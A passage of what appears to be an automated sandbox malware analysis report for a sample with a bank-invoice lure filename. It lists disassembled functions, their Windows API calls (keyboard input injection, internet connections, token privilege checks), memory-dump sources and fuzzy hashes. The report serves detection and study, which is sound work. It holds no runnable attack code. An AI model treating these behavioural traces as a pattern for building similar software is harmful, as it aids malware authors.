                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    • Opcode ID: 314e7893a8b0519735fab95e602552623869f95844128fd58c3a093fa0a7ed79
                    • Instruction ID: 3adb553fb841cb46d5e12bfc3673ca951a45baf18f2a7b25139635e0ca3e48b5
                    • Opcode Fuzzy Hash: 314e7893a8b0519735fab95e602552623869f95844128fd58c3a093fa0a7ed79
                    • Instruction Fuzzy Hash: 64C17C716083058FC714DF28C48096ABBE4FF89718F14996EF999EB361D730E906CB82
                    Function 00ED6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: d5dc1f7bb4b8de98d1254dda377cd378618c8822444975d29acbb51002e93ece
                    • Instruction ID: 467569dcfcfc7cfd31aa5ea83ebae361789cd71f72c3189a1bd0fd3aa43aeaaf
                    • Opcode Fuzzy Hash: d5dc1f7bb4b8de98d1254dda377cd378618c8822444975d29acbb51002e93ece
                    • Instruction Fuzzy Hash: 9651B934B047019ADB30AF65D891A6DB3E5EF48310F24B81FE99AFB3D1EB7098419B51
                    Function 00F09A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(011BE728,?), ref: 00F09AD2
                    • ScreenToClient.USER32(00000002,00000002), ref: 00F09B05
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F09B72
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: 7d600cb4e1ac2e034768cab0e9e0695825a2591aa5598c979f18fff75536c38b
                    • Instruction ID: b2ee47ac841638a716d462d66fbcd29b11139ab99a1756e89cb8d550504b7d39
                    • Opcode Fuzzy Hash: 7d600cb4e1ac2e034768cab0e9e0695825a2591aa5598c979f18fff75536c38b
                    • Instruction Fuzzy Hash: 95514C74A04209AFCF24DF58D8809AE7BB6FF95334F148159F8159B291E770AE81EB50
                    Function 00EEBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EEBB09
                    • GetLastError.KERNEL32(?,00000000), ref: 00EEBB2F
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EEBB54
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EEBB80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: 63247360016d4ffbcb5f2d67087e9fcda6b9914dbfebf398f48e582762788831
                    • Instruction ID: beca317f359df26371d86df7f2276e4e5ff4f20ff998122791107a5f57a4713c
                    • Opcode Fuzzy Hash: 63247360016d4ffbcb5f2d67087e9fcda6b9914dbfebf398f48e582762788831
                    • Instruction Fuzzy Hash: B1412839600654DFCB20EF15C584A6EBBE1EF89314B199498E84EAB762CB34FD01DB91
                    Function 00F08AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F08B4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: b97c221ef1b84398f8f1266274c942c52e168662d3c6b8b0d30b2ab4d8bc782f
                    • Instruction ID: 7f2bf885a35c4325e4cbf95e67f939301a030503e586d05986bee9d36bc477fd
                    • Opcode Fuzzy Hash: b97c221ef1b84398f8f1266274c942c52e168662d3c6b8b0d30b2ab4d8bc782f
                    • Instruction Fuzzy Hash: 7D31D4F4A00208BEEF349E18CC45FA93BA5FB463A0F244512FAD1D76E1DE34A942B751
                    Function 00F0ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                    Download Yara Rule
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00F0AE1A
                    • GetWindowRect.USER32(?,?), ref: 00F0AE90
                    • PtInRect.USER32(?,?,00F0C304), ref: 00F0AEA0
                    • MessageBeep.USER32(00000000), ref: 00F0AF11
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: 419f02e2554af74aa439465bdea940b785497d774ef7935a90bef340f9742e5b
                    • Instruction ID: 04af0cb72e659916a9ee44339fc3e321247a55e57cf8c47d673e6d3f567ebedf
                    • Opcode Fuzzy Hash: 419f02e2554af74aa439465bdea940b785497d774ef7935a90bef340f9742e5b
                    • Instruction Fuzzy Hash: E7417B75A00319DFCB11CF59C884BA9BBF5FF4A351F2881A9E814CB291D731A841FB92
                    Function 00EE0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EE1037
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00EE1053
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00EE10B9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00EE110B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: e9b5dab0a3893c1e57355614411857aab3954bda8e7342f7848dfe7764c3b06a
                    • Instruction ID: 4ba782aa2bce8ac73cefe93042a45cfaf91413633b74794225568803668641f9
                    • Opcode Fuzzy Hash: e9b5dab0a3893c1e57355614411857aab3954bda8e7342f7848dfe7764c3b06a
                    • Instruction Fuzzy Hash: 37315630E446CCAEFF308B678C05BFEBBA9AB45324F08629AE591721D1C3758DC49761
                    Function 00EE1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 00EE1176
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00EE1192
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00EE11F1
                    • SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 00EE1243
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 41816faf08f73623112e1ab03771726733d282de105f383899f4091e82b55076
                    • Instruction ID: eb048514ae79e0efb1d13d5df4f683db2f4385f2a02e732ad0c1c83e4b52c68b
                    • Opcode Fuzzy Hash: 41816faf08f73623112e1ab03771726733d282de105f383899f4091e82b55076
                    • Instruction Fuzzy Hash: 9A316830A4128C9AEF308AA78C047FE7BAAAB49314F08639AE691B21E1C37449C49751
                    Function 00EB6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EB644B
                    • __isleadbyte_l.LIBCMT ref: 00EB6479
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EB64A7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EB64DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 0139b62e8429261c5a6c56fa3edbedaac796c928465bab6701fe729ad322e0bd
                    • Instruction ID: 9fea583122a09e8e3c7e93367b09e75f540668cc9c479ca5b1c54398a93c93e3
                    • Opcode Fuzzy Hash: 0139b62e8429261c5a6c56fa3edbedaac796c928465bab6701fe729ad322e0bd
                    • Instruction Fuzzy Hash: 1231EF3160064AAFDB218F74C844BFB7BE9FF41314F155429F864AB1A0EB39E850DB90
                    Function 00F05175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32 ref: 00F05189
                      • Part of subcall function 00EE387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EE3897
                      • Part of subcall function 00EE387D: GetCurrentThreadId.KERNEL32 ref: 00EE389E
                      • Part of subcall function 00EE387D: AttachThreadInput.USER32(00000000,?,00EE52A7), ref: 00EE38A5
                    • GetCaretPos.USER32(?), ref: 00F0519A
                    • ClientToScreen.USER32(00000000,?), ref: 00F051D5
                    • GetForegroundWindow.USER32 ref: 00F051DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: e6f701039f66a247067f1db79763a8588958dd892786a47c5bc04d2c13012801
                    • Instruction ID: 6ef0e90ab8e974fa7699ce05f0d075b5b812b3be9535c08b408c084750dbb2d6
                    • Opcode Fuzzy Hash: e6f701039f66a247067f1db79763a8588958dd892786a47c5bc04d2c13012801
                    • Instruction Fuzzy Hash: B6310E71D00108AFDB14EFA5C9859EFB7F9EF98304F14506AE41AF7242EA759E05CBA0
                    Function 00EA0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                    • __setmode.LIBCMT ref: 00EA0BF2
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                    • _fprintf.LIBCMT ref: 00EA0C29
                    • OutputDebugStringW.KERNEL32(?), ref: 00ED6331
                      • Part of subcall function 00EA4CDA: _flsall.LIBCMT ref: 00EA4CF3
                    • __setmode.LIBCMT ref: 00EA0C5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: 553d00a8b0702b1d5a286bf84c5b756dd7e927a3b46308bf1e6280fd99595ea6
                    • Instruction ID: 027ec55713a215bf06d8e0529e0dcb1984ecca31985ed2e71bb2461876116aaf
                    • Opcode Fuzzy Hash: 553d00a8b0702b1d5a286bf84c5b756dd7e927a3b46308bf1e6280fd99595ea6
                    • Instruction Fuzzy Hash: 911127729042087FCB04B7B49C439BEBBE89FCA320F14215AF20C7B1C2DEA16D469791
                    Function 00ED8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00ED8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00ED8669
                      • Part of subcall function 00ED8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00ED8673
                      • Part of subcall function 00ED8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ED8682
                      • Part of subcall function 00ED8652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00ED8689
                      • Part of subcall function 00ED8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ED869F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00ED8BEB
                    • _memcmp.LIBCMT ref: 00ED8C0E
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00ED8C44
                    • HeapFree.KERNEL32(00000000), ref: 00ED8C4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 2182266621-0
                    • Opcode ID: b471b8b97d32d53bc1c772e17603f7f7d4e797ed5ad3c2e1c48ef68ac1641998
                    • Instruction ID: fa9730d303b23209efdf6aad57a81b930db039ede498186dfbecb64c8cb3d82d
                    • Opcode Fuzzy Hash: b471b8b97d32d53bc1c772e17603f7f7d4e797ed5ad3c2e1c48ef68ac1641998
                    • Instruction Fuzzy Hash: 9C218971E11208EBDB10CFA4CA48BEEB7B8EF54354F04409AE454AB240EB31AA06DB61
                    Function 00EF1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EF1A97
                      • Part of subcall function 00EF1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EF1B40
                      • Part of subcall function 00EF1B21: InternetCloseHandle.WININET(00000000), ref: 00EF1BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 81a6ec6cd7e82728ed8b66877abca4045116ccc916e92e583365ef1b5d08de32
                    • Instruction ID: 5fd95e0f9e123b57695847eeb8815fc78332a569e461ba3e3b7f284a36873b6f
                    • Opcode Fuzzy Hash: 81a6ec6cd7e82728ed8b66877abca4045116ccc916e92e583365ef1b5d08de32
                    • Instruction Fuzzy Hash: 69219F35200A0DFFDB229F608C01FBAB7A9FF84701F10105EFB11A6651EB719815ABA1
                    Function 00EDE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EDF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00EDE1C4,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?), ref: 00EDF5BC
                      • Part of subcall function 00EDF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00EDF5E2
                      • Part of subcall function 00EDF5AD: lstrcmpiW.KERNEL32(00000000,?,00EDE1C4,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?), ref: 00EDF613
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDE1DD
                    • lstrcpyW.KERNEL32(00000000,?), ref: 00EDE203
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDE237
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 531e903cadbb13a4f5dafc10eaf71ffcd0cf3abe3211bd5dc993e007176f200e
                    • Instruction ID: 0a9784b71f555509e9d5bf7d1e1053fc0e4a3db01f02fae9fd7259c867531553
                    • Opcode Fuzzy Hash: 531e903cadbb13a4f5dafc10eaf71ffcd0cf3abe3211bd5dc993e007176f200e
                    • Instruction Fuzzy Hash: A3118136200345EFCB25AF64DC4997A77B8FF49354B40502BF816DB360EB71A85297A0
                    Function 00EB5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00EB5351
                      • Part of subcall function 00EA594C: __FF_MSGBANNER.LIBCMT ref: 00EA5963
                      • Part of subcall function 00EA594C: __NMSG_WRITE.LIBCMT ref: 00EA596A
                      • Part of subcall function 00EA594C: RtlAllocateHeap.NTDLL(011A0000,00000000,00000001), ref: 00EA598F
                    Memory Dump Source
